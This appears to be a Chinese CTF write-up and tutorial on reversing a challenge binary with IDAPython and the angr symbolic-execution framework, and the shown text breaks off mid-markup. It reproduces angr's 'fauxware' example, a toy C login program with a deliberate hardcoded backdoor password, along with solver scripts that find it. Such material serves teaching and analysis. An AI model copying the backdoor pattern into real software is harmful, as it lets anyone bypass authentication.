<h1 id="第一种解法：IDApython"><a href="#第一种解法：IDApython" class="headerlink" title="第一种解法：IDApython"></a>第一种解法：IDApython</h1><p>其中一种解题方法是用IDApython来解，这里也学习了一些IDApython脚本的用法，具体脚本如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">trans</span><span class="params">(xx, kk)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> [(x-kk) &amp; <span class="number">0xFF</span> <span class="keyword">for</span> x <span class="keyword">in</span> xx]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor</span><span class="params">(xx, kk)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> [x^kk <span class="keyword">for</span> x <span class="keyword">in</span> xx]</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">not_</span><span class="params">(xx)</span>:</span></span><br><span class="line">    <span class="keyword">return</span> [~x <span class="keyword">for</span> x <span class="keyword">in</span> xx]</span><br><span class="line"></span><br><span class="line">dt = [<span class="number">0xd9</span>, <span class="number">0x2c</span>, <span class="number">0x27</span>, <span class="number">0xd6</span>, <span class="number">0xd8</span>, <span class="number">0x2a</span>, <span class="number">0xda</span>, <span class="number">0x2d</span>, <span class="number">0xd7</span>, <span class="number">0x2c</span>, <span class="number">0xdc</span>, <span class="number">0xe1</span>, <span class="number">0xdb</span>, <span class="number">0x2c</span>, <span class="number">0xd9</span>, <span class="number">0xdd</span>, <span class="number">0x27</span>, <span class="number">0x2d</span>, <span class="number">0x2a</span>, <span class="number">0xdc</span>, <span class="number">0xdb</span>, <span class="number">0x2c</span>, <span class="number">0xe1</span>, <span class="number">0x29</span>, <span class="number">0xda</span>, <span class="number">0xda</span>, <span class="number">0x2c</span>, <span class="number">0xda</span>, <span class="number">0x2a</span>, <span class="number">0xd9</span>, <span class="number">0x29</span>, <span class="number">0x2a</span>]</span><br><span class="line"></span><br><span class="line">ads = <span class="number">0x4005B0</span></span><br><span class="line">end = <span class="number">0x401DC0</span></span><br><span class="line">i = PrevHead(end)</span><br><span class="line"><span class="keyword">while</span> i &gt; ads:  <span class="comment">#获取不同的指令以及指令的操作数来进行求解</span></span><br><span class="line">    <span class="keyword">if</span> GetMnem(i) == <span class="string">'xor'</span> <span class="keyword">and</span> GetOpnd(i, <span class="number">0</span>) == <span class="string">'byte ptr [rdx+rax+5]'</span>:</span><br><span class="line">        k = int(GetOpnd(i, <span class="number">1</span>).rstrip(<span class="string">'h'</span>), <span class="number">16</span>)</span><br><span class="line">        dt = xor(dt, k)</span><br><span class="line">        print(<span class="string">"xor: &#123;&#125;"</span>.format(k))</span><br><span class="line">    <span class="keyword">if</span> GetMnem(i) == <span class="string">'add'</span> <span class="keyword">and</span> GetOpnd(i, <span class="number">0</span>) == <span class="string">'byte ptr [rdx+rax+5]'</span>:</span><br><span class="line">        k = int(GetOpnd(i, <span class="number">1</span>).rstrip(<span class="string">'h'</span>), <span class="number">16</span>)</span><br><span class="line">        dt = trans(dt, k)</span><br><span class="line">        print(<span class="string">"trans: &#123;&#125;"</span>.format(k))</span><br><span class="line">    <span class="keyword">if</span> GetMnem(i) == <span class="string">'not'</span> <span class="keyword">and</span> GetOpnd(i, <span class="number">0</span>) == <span class="string">'byte ptr [rdx+rax+5]'</span>:</span><br><span class="line">        dt = not_(dt)</span><br><span class="line">        print(<span class="string">"not: &#123;&#125;"</span>.format(k))</span><br><span class="line">    i = PrevHead(i)</span><br><span class="line"></span><br><span class="line">print(dt)</span><br></pre></td></tr></table></figure>

<h1 id="第二种解法：angr"><a href="#第二种解法：angr" class="headerlink" title="第二种解法：angr"></a>第二种解法：angr</h1><p>当然我这这篇文章主要要说的就是第二种解法了：angr求解</p>
<h2 id="What-is-angr"><a href="#What-is-angr" class="headerlink" title="What is angr"></a>What is angr</h2><p>首先angr是一个什么东西呢</p>
<p>angr is a suite of Python 3 libraries that let you load a binary and do a lot of cool things to it:</p>
<p>(angr是一个套用来加载二进制文件做一些很酷的事情的python3库)</p>
<p>具体可以用来做以下的一些事（虽然不知道大佬们把这些翻译成什么中文了，大致看看先）</p>
<ul>
<li>Disassembly and intermediate-representation lifting</li>
<li>Program instrumentation</li>
<li>Symbolic execution</li>
<li>Control-flow analysis</li>
<li>Data-dependency analysis</li>
<li>Value-set analysis (VSA)</li>
<li>Decompilation</li>
</ul>
<p>在使用之前强烈建议多了解一下符号执行的概念，要不然官方文档中很多英文还有概念可能会看不懂，特别是那些带数学符号的概念名词，不过细心一点看不会很难懂的。但是毕竟有些词语有些学术化，我也懒得用那么多俗语来解释了，下文只在一些重要地方做一些注释</p>
<p>例如：<a href="https://blog.csdn.net/omnispace/article/details/80248252" target="_blank" rel="noopener">这篇文章</a></p>
<h3 id="安装"><a href="#安装" class="headerlink" title="安装"></a>安装</h3><p>安装环境：Ubuntu16.04</p>
<ol>
<li>安装之前首先把自己默认的python3.5换成了python 3.7.1(编译安装)</li>
<li><code>sudo apt-get install python3-dev libffi-dev build-essential virtualenvwrapper</code></li>
<li><code>mkvirtualenv --python=$(which python3) angr &amp;&amp; pip install angr</code></li>
</ol>
<p>其中virtualenvwrapper是一个Python虚拟环境，使用虚拟环境的主要原因是angr会修改libz3和libVEX</p>
<p>创建虚拟环境之后每次使用<code>workon</code>和<code>deactivate</code>即可在真实与虚拟环境切换</p>
<h3 id="使用-amp-examples"><a href="#使用-amp-examples" class="headerlink" title="使用&amp;examples"></a>使用&amp;examples</h3><p>这里用一个简单的例子来开始直接上手学习angr吧</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;string.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdlib.h&gt;</span></span></span><br><span class="line"><span class="keyword">char</span> *sneaky = <span class="string">"SOSNEAKY"</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">authenticate</span><span class="params">(<span class="keyword">char</span> *username, <span class="keyword">char</span> *password)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> stored_pw[<span class="number">9</span>];</span><br><span class="line">    stored_pw[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">int</span> pwfile;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// evil back d00r</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strcmp</span>(password, sneaky) == <span class="number">0</span>) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line">    pwfile = <span class="built_in">open</span>(username, O_RDONLY);</span><br><span class="line">    <span class="built_in">read</span>(pwfile, stored_pw, <span class="number">8</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="built_in">strcmp</span>(password, stored_pw) == <span class="number">0</span>) <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">accepted</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Welcome to the admin console, trusted user!\n"</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">rejected</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Go away!"</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">1</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">int</span> argc, <span class="keyword">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">char</span> username[<span class="number">9</span>];</span><br><span class="line">    <span class="keyword">char</span> password[<span class="number">9</span>];</span><br><span class="line">    <span class="keyword">int</span> authed;</span><br><span class="line"></span><br><span class="line">    username[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line">    password[<span class="number">8</span>] = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Username: \n"</span>);</span><br><span class="line">    <span class="built_in">read</span>(<span class="number">0</span>, username, <span class="number">8</span>);</span><br><span class="line">    <span class="built_in">read</span>(<span class="number">0</span>, &amp;authed, <span class="number">1</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"Password: \n"</span>);</span><br><span class="line">    <span class="built_in">read</span>(<span class="number">0</span>, password, <span class="number">8</span>);</span><br><span class="line">    <span class="built_in">read</span>(<span class="number">0</span>, &amp;authed, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    authed = authenticate(username, password);</span><br><span class="line">    <span class="keyword">if</span> (authed) accepted();</span><br><span class="line">    <span class="keyword">else</span> rejected();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这里程序给出了一个很简单的逻辑，具体是我们只要输入<code>password</code>为<code>&quot;SOSNEAKY&quot;</code>就可以直接认证通过</p>
<p>然后这里是angr官网给出的<a href="https://github.com/angr/angr-doc/blob/master/examples/fauxware/solve.py" target="_blank" rel="noopener">solve.py</a>，我在其中注释处做了一些补充笔记</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> angr</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="comment"># Look at fauxware.c! This is the source code for a "faux firmware" (@zardus</span></span><br><span class="line"><span class="comment"># really likes the puns) that's meant to be a simple representation of a</span></span><br><span class="line"><span class="comment"># firmware that can authenticate users but also has a backdoor - the backdoor</span></span><br><span class="line"><span class="comment"># is that anybody who provides the string "SOSNEAKY" as their password will be</span></span><br><span class="line"><span class="comment"># automatically authenticated.</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">basic_symbolic_execution</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="comment"># We can use this as a basic demonstration of using angr for symbolic</span></span><br><span class="line">    <span class="comment"># execution. First, we load the binary into an angr project.</span></span><br><span class="line">    <span class="comment"># 这里先展示了一个很基础的符号执行，首先把对应的binary文件名填进一个angr Project</span></span><br><span class="line">    p = angr.Project(<span class="string">'eg1'</span>,load_options=&#123;<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>&#125;)</span><br><span class="line">    <span class="comment"># 这里我加上了 "load_options=&#123;"auto_load_libs": False&#125;"</span></span><br><span class="line">    <span class="comment"># 在load了Project之后可以用p.loader.all_objects查看所有加载器已加载的对象</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Now, we want to construct a representation of symbolic program state.</span></span><br><span class="line">    <span class="comment"># SimState objects are what angr manipulates when it symbolically executes</span></span><br><span class="line">    <span class="comment"># binary code.</span></span><br><span class="line">    <span class="comment"># SimState对象也主要保存着程序运行到某一阶段的状态信息。通过这个对象可以操作某一运行状态的上下文信息</span></span><br><span class="line">    <span class="comment"># 比如内存，寄存器等</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 可以通过Project.factory这个容器中的任何一个方法来获取SimState对象,这个factory有多个构造函数</span></span><br><span class="line">    <span class="comment"># 如:block、entry_state等。这里使用entry_state返回一个初始化到二进制entry point的SimState对象</span></span><br><span class="line">    <span class="comment"># The entry_state constructor generates a SimState that is a very generic</span></span><br><span class="line">    <span class="comment"># representation of the possible program states at the program's entry</span></span><br><span class="line">    <span class="comment"># point.	 entry_state 主要是做一些初始化工作，然后在程序的入口处停下</span></span><br><span class="line">    <span class="comment"># There are more constructors, like blank_state, which constructs a</span></span><br><span class="line">    <span class="comment"># "blank slate" state that specifies as little concrete data as possible,</span></span><br><span class="line">    <span class="comment"># or full_init_state, which performs a slow and pedantic initialization of</span></span><br><span class="line">    <span class="comment"># program state as it would execute through the dynamic loader.</span></span><br><span class="line">    <span class="comment"># 其中 full_init_state 会从动态链接时开始就记录</span></span><br><span class="line"></span><br><span class="line">    state = p.factory.entry_state()</span><br><span class="line">    <span class="comment"># state对象一般是作为 符号执行开始前创建用来为后续的执行初始化一些数据，比如栈状态，寄存器值。</span></span><br><span class="line">    <span class="comment"># 或者在 路径探索结束后 返回一个 state 对象供用户提取需要的值或进行约束求解</span></span><br><span class="line">    <span class="comment"># 解出到达目标分支所使用的符号量的值。</span></span><br><span class="line">    </span><br><span class="line">    <span class="comment"># 当然了解了符号执行的概念之后就知道为什么有时候要默认在程序入口点停下了，毕竟我们暂时要分析的是程序的执行流</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Now, in order to manage the symbolic execution process from a very high</span></span><br><span class="line">    <span class="comment"># level, we have a SimulationManager. SimulationManager is just collections</span></span><br><span class="line">    <span class="comment"># of states with various tags attached with a number of convenient</span></span><br><span class="line">    <span class="comment"># interfaces for managing them.</span></span><br><span class="line"></span><br><span class="line">    sm = p.factory.simulation_manager(state)</span><br><span class="line">    <span class="comment"># 根据state设置 Simulation Managers ，这是一个进行路径探索的对象</span></span><br><span class="line">    <span class="comment"># Uncomment the following line to spawn an IPython shell when the program</span></span><br><span class="line">    <span class="comment"># gets to this point so you can poke around at the four objects we just</span></span><br><span class="line">    <span class="comment"># constructed. Use tab-autocomplete and IPython's nifty feature where if</span></span><br><span class="line">    <span class="comment"># you stick a question mark after the name of a function or method and hit</span></span><br><span class="line">    <span class="comment"># enter, you are shown the documentation string for it.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># import IPython; IPython.embed()</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># Now, we begin execution. This will symbolically execute the program until</span></span><br><span class="line">    <span class="comment"># we reach a branch statement for which both branches are satisfiable.</span></span><br><span class="line"></span><br><span class="line">    sm.run(until=<span class="keyword">lambda</span> sm_: len(sm_.active) &gt; <span class="number">1</span>)</span><br><span class="line">    <span class="comment"># 此示例代码采用的方法是用Simulation Managers的run方法</span></span><br><span class="line">    <span class="comment"># 执行刚好出现 2个分支时就执行完毕，也就是我们后门函数的那个if条件被触发，此时程序产生两个执行分支，随即停止</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># If you look at the C code, you see that the first "if" statement that the</span></span><br><span class="line">    <span class="comment"># program can come across is comparing the result of the strcmp with the</span></span><br><span class="line">    <span class="comment"># backdoor password. So, we have halted execution with two states, each of</span></span><br><span class="line">    <span class="comment"># which has taken a different arm of that conditional branch. If you drop</span></span><br><span class="line">    <span class="comment"># an IPython shell here and examine sm.active[n].solver.constraints</span></span><br><span class="line">    <span class="comment"># you will see the encoding of the condition that was added to the state to</span></span><br><span class="line">    <span class="comment"># constrain it to going down this path, instead of the other one. These are</span></span><br><span class="line">    <span class="comment"># the constraints that will eventually be passed to our constraint solver</span></span><br><span class="line">    <span class="comment"># (z3) to produce a set of concrete inputs satisfying them.</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># As a matter of fact, we'll do that now.</span></span><br><span class="line"></span><br><span class="line">    input_0 = sm.active[<span class="number">0</span>].posix.dumps(<span class="number">0</span>)</span><br><span class="line">    input_1 = sm.active[<span class="number">1</span>].posix.dumps(<span class="number">0</span>)</span><br><span class="line"></span><br><span class="line">    <span class="comment"># We have used a utility function on the state's posix plugin to perform a</span></span><br><span class="line">    <span class="comment"># quick and dirty concretization of the content in file descriptor zero,</span></span><br><span class="line">    <span class="comment"># stdin. One of these strings should contain the substring "SOSNEAKY"!</span></span><br><span class="line"></span><br><span class="line">    <span class="comment"># 当然这里也可以选择把所有分支都打印出来看看,代码:</span></span><br><span class="line">    <span class="comment"># for i in range(len(pathgroup.active)):</span></span><br><span class="line">    <span class="comment">#    print "possible %d: " % i, pathgroup.active[i].state.posix.dumps(0)</span></span><br><span class="line">    <span class="comment"># 此时dump的就是字符串str</span></span><br><span class="line">    <span class="keyword">if</span> <span class="string">b'SOSNEAKY'</span> <span class="keyword">in</span> input_0:</span><br><span class="line">        <span class="keyword">return</span> input_0</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> input_1</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">test</span><span class="params">()</span>:</span></span><br><span class="line">    r = basic_symbolic_execution()</span><br><span class="line">    <span class="keyword">assert</span> <span class="string">b'SOSNEAKY'</span> <span class="keyword">in</span> r</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    sys.stdout.buffer.write(basic_symbolic_execution())</span><br><span class="line"></span><br><span class="line"><span class="comment"># You should be able to run this script and pipe its output to fauxware and</span></span><br><span class="line"><span class="comment"># fauxware will authenticate you.</span></span><br></pre></td></tr></table></figure>

<p>其中在创建Project时有这么一个点要注意一下</p>
<blockquote>
<p>auto_load_libs 设置是否自动载入依赖的库，如果设置为 True 的话会自动载入依赖的库，然后分析到库函数调用时也会进入库函数，这样会增加分析的工作量，也有能会跑挂</p>
</blockquote>
<p>eg1的第二个solve代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">proj = angr.Project(<span class="string">'eg1'</span>)</span><br><span class="line">state = proj.factory.entry_state()</span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    succ = state.step()	<span class="comment"># 一次step记录一次执行分支的state</span></span><br><span class="line">    <span class="keyword">if</span> len(succ.successors) == <span class="number">2</span>:<span class="comment">#这个代码的意思也是在产生两个分支时停下，打印输出用上面代码的注释那段就好</span></span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    state = succ.successors[<span class="number">0</span>]</span><br><span class="line">state1, state2 = succ.successors</span><br></pre></td></tr></table></figure>

<p>这里step函数的返回值是 “an object called <a href="http://angr.io/api-doc/angr.html#module-angr.engines.successors" target="_blank" rel="noopener">SimSuccessors</a>“</p>
<p>当然这里写法还有很多很多，具体强烈推荐参考<a href="https://docs.angr.io/core-concepts/pathgroups" target="_blank" rel="noopener">官方文档</a>，还有<a href="http://angr.io/api-doc/angr.html" target="_blank" rel="noopener">官方API文档</a>，本博客在文末板块会尽量更新一下CTF中碰到的用法，限于英语原因很多原文中的<code>core conception</code>可能本人理解会有误</p>
<p>博主写到这里暂时感觉最好用的函数是这几个：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">simgr.step()<span class="comment">#这个就是上面代码中的，一个分支一个分支的记录也好像挺好用2333</span></span><br><span class="line"></span><br><span class="line">sm.explore(find=<span class="number">0x400591</span>) <span class="comment"># 这个是直接设置符号执行遍历到哪个代码块停下来，很好用</span></span><br><span class="line"></span><br><span class="line">simgr.explore(find=<span class="keyword">lambda</span> s: <span class="string">b"Congrats"</span> <span class="keyword">in</span> s.posix.dumps(<span class="number">1</span>))<span class="comment">#这个是用标准输出中输出了什么来判断，直接用起来也很无脑</span></span><br></pre></td></tr></table></figure>



<h2 id="此道逆向题的angr解法"><a href="#此道逆向题的angr解法" class="headerlink" title="此道逆向题的angr解法"></a>此道逆向题的angr解法</h2><p>中间这些state操作建议先参考文末的设置&amp;变量用法</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> angr</span><br><span class="line"><span class="keyword">import</span> claripy</span><br><span class="line"></span><br><span class="line">p = angr.Project(<span class="string">"./funre"</span>, load_options=&#123;<span class="string">"auto_load_libs"</span>: <span class="literal">False</span>&#125;)</span><br><span class="line">f = p.factory</span><br><span class="line">state = f.entry_state(addr=<span class="number">0x400605</span>) <span class="comment"># 设置state开始运行时运行到的地址</span></span><br><span class="line">flag = claripy.BVS(<span class="string">"flag"</span>, <span class="number">8</span>*<span class="number">32</span>) <span class="comment">#这里设置了一个flag VBS，长度是8*32bit</span></span><br><span class="line">state.memory.store(<span class="number">0x603055</span>+<span class="number">0x300</span>+<span class="number">5</span>, flag) <span class="comment">#因为程序没有输入，所以直接把字符串设置到内存</span></span><br><span class="line">state.regs.rdx = <span class="number">0x603055</span>+<span class="number">0x300</span> </span><br><span class="line">state.regs.rdi = <span class="number">0x603055</span>+<span class="number">0x300</span>+<span class="number">5</span> <span class="comment"># 然后设置两个寄存器</span></span><br><span class="line"></span><br><span class="line">sm = p.factory.simulation_manager(state) <span class="comment"># 准备从该state开始遍历执行路径</span></span><br><span class="line"></span><br><span class="line">print(<span class="string">"[+] init ok"</span>)</span><br><span class="line"></span><br><span class="line">sm.explore(find=<span class="number">0x401DAE</span>) <span class="comment"># 遍历到成功的地址</span></span><br><span class="line"><span class="keyword">if</span> sm.found:</span><br><span class="line">    print(<span class="string">"[+] found!"</span>)</span><br><span class="line">    x = sm.found[<span class="number">0</span>].solver.eval(flag, cast_to=bytes)</span><br><span class="line">    print(x)</span><br></pre></td></tr></table></figure>

<p>我跑下来大概只用了一两分钟时间不到？不过貌似还能加速，这里也介绍一下加速要用到的东西</p>
<h2 id="加速模块安装"><a href="#加速模块安装" class="headerlink" title="加速模块安装"></a>加速模块安装</h2><hr>
<p>注意这里安装的方法本人安装失败了…介于之前装崩python的原因就暂时不继续探究原因了，只不过好像是一个什么版本的问题,具体参考<a href="https://www.secpulse.com/archives/83197.html" target="_blank" rel="noopener">这篇文章</a>末尾</p>
<ol>
<li><code>sudo apt install pypy</code></li>
<li><code>wget https://bootstrap.pypa.io/get-pip.py</code></li>
<li><code>sudo pypy get-pip.py</code></li>
</ol>
<hr>
<p>第二种方法就是在init_state时加上<code>add_options=angr.options.unicorn</code></p>
<h1 id="angr中碰到的一些设置-amp-变量用法"><a href="#angr中碰到的一些设置-amp-变量用法" class="headerlink" title="angr中碰到的一些设置&amp;变量用法"></a>angr中碰到的一些设置&amp;变量用法</h1><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">################## 设置操作</span></span><br><span class="line">state.solver.BVV(<span class="number">1</span>, <span class="number">64</span>) <span class="comment"># 设置一个Bitvector 第一个参数是初始值 第二个参数是长度 也可以用下面简单的写法</span></span><br><span class="line"></span><br><span class="line">args = claripy.BVS(<span class="string">"args"</span>, <span class="number">8</span> * <span class="number">16</span>) <span class="comment"># 用claripy包设置一个符号变量（十六进制字符串）</span></span><br><span class="line"></span><br><span class="line">weird_nine.zero_extend(<span class="number">64</span> - <span class="number">27</span>) <span class="comment"># Bitvector长度转换 这里示意是从27-&gt;64</span></span><br><span class="line"></span><br><span class="line">p.hook(addr=<span class="number">0x08048485</span>, hook=hook_demo, length=<span class="number">2</span>) <span class="comment"># 设置一个hook，address是执行到什么地方之后hook，hook_demo代表一个函数，length是hook_demo执行之后需要跳过的指令长度</span></span><br><span class="line"><span class="comment">#具体的hook操作在以后会慢慢写到</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">################## state操作</span></span><br><span class="line">state.regs.X		<span class="comment"># X代表要操作的寄存器，这里可以设置寄存器的值，此时寄存器的类型是一个Bitvector</span></span><br><span class="line"></span><br><span class="line">hex(state.se.eval(state.regs.X))	<span class="comment"># 想要获取寄存器Bitvector的int值需要使用eval函数来获取 BVS同理</span></span><br><span class="line"></span><br><span class="line">state.mem[state.regs.rsp].qword <span class="comment"># 获取某个寄存器指向的内存 可以看到这里mem的参数也是BVV</span></span><br><span class="line">							 <span class="comment"># 但是返回值是类似这种:&lt;uint64_t &lt;BV64 0xdeadbeefdeadbeef&gt; at 0x7fffffffffeff78&gt;</span></span><br><span class="line">state.se.eval(xxx.qword.resolved) <span class="comment"># 通过eval拿到此地址对应类型的确切值</span></span><br><span class="line"></span><br><span 